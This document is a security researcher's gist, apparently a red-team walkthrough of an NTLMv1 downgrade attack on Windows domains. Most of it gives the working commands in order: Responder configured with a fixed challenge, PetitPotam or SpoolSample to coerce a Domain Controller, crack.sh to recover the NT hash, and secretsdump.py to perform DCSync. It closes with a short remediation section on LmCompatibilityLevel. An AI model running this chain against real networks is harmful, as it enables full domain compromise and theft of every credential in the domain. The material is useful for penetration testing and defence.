@S3cur3Th1sSh1t
Last active July 20, 2023 14:18
What is this?

This technique is already some years old. Nothing really new, but still very fancy and effective. It is described, for example, in this repository. I myself starred this repo some years ago because I found it interesting, but for who knows what reasons never used the technique in a project. Only once, trying to brute-force an NTLMv1 hash via Hashcat, I found myself facing too long a wait time, and the technique disappeared into the background again.

But what if we can get instant domain pwnage via NTLMv1 downgrade attacks? I stumbled across this Tweet from T3nb3w, who himself got the tip from MrUn1k0d3r.

Time to revisit the technique and the necessary steps.

Which systems are vulnerable?

According to the repo: "This will work on networks where 'LAN Manager authentication level' is set to 2 or less. This is a fairly common scenario in older, larger Windows deployments. It should not work on Windows 10 / Server 2016 or newer."

But: newer systems may also be affected, for example through manual misconfiguration, or because the legacy setting survived a migration and is still alive on systems running Windows Server 2019 or other recent versions.

What can we do - low level?

If we can coerce a Domain Controller into authenticating to our attacker system with SpoolSample or PetitPotam, we can downgrade that authentication to NetNTLMv1 challenge/response. NetNTLMv1 protects the NT (or LM) hash with the outdated DES cipher: the 16-byte hash is padded with zeros to 21 bytes, split into three 7-byte DES keys, and each key encrypts the 8-byte server challenge, giving the 24-byte response.

So by brute-forcing the DES keys we get back the NT or LM hash (if in use) of the target machine account. No password cracking is needed: the hash itself is enough for pass-the-hash. Exhausting the DES key space for the first two keys takes several days with Hashcat (the third key holds only two bytes of the hash plus zero padding and falls instantly). Instead, because we control the server challenge and can fix it to 1122334455667788, we can use precomputed rainbow tables via the free cracking service crack.sh.

But how?

  1. Modify Responder.conf so that the Challenge line reads Challenge = 1122334455667788 (the default is Challenge = Random):


  2. Start Responder with the flags --lm and --disable-ess (the latter stops Responder from negotiating Extended Session Security, which would mix a client nonce into the challenge and defeat the fixed-challenge tables):

Responder.py -I eth0 --lm --disable-ess

  3. Trigger Domain Controller machine authentication to your Responder listener interface via SpoolSample or PetitPotam:

PetitPotam.exe Responder-IP DC-IP

PetitPotam.py -u User -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP

OR

SpoolSample.exe DC-IP Responder-IP

[screenshot: PetitPotam]

If you didn't get an NTLMv1 hash here, the target system is not vulnerable: its LAN Manager authentication level refuses to send NTLMv1 (you will typically see an NTLMv2-SSP hash instead). If nothing arrived at all, first make sure the coercion itself worked (Print Spooler disabled, PetitPotam patched, firewall in between); that alone says nothing about the NTLM settings.

  4. Grab the 48 hex characters of the NT response from the incoming DC NTLMv1 authentication. Responder prints the hash as user::domain:LMresponse:NTresponse:challenge; the NT response is the second 48-character field:

[screenshot: NTLMv1Response]

  5. Submit it to crack.sh with NTHASH: in front, i.e. NTHASH:<48 hex characters>:

[screenshot: crack.sh]

[screenshot: GetCracking]

  6. You'll receive an e-mail with the cracked NT hash:

[screenshot: Cracked]

DCSync via secretsdump.py, authenticating as the DC machine account with the recovered NT hash (the LM half of -hashes is ignored and can be left empty):

secretsdump.py -hashes CrackedHash:CrackedHash 'Domain/DC-Hostname$'@DC-IP

Win.

Remediation

Set the LAN Manager authentication level (LmCompatibilityLevel under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) to at minimum level 3, Send NTLMv2 responses only; recommended is level 5, Send NTLMv2 responses only. Refuse LM & NTLM. Level 3 stops the Domain Controller from sending NTLMv1 when it is coerced, while level 5 additionally makes it refuse NTLMv1 from clients. Roll this out via GPO to all systems, not only Domain Controllers, and verify it on migrated legacy machines where the old value may have survived.

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
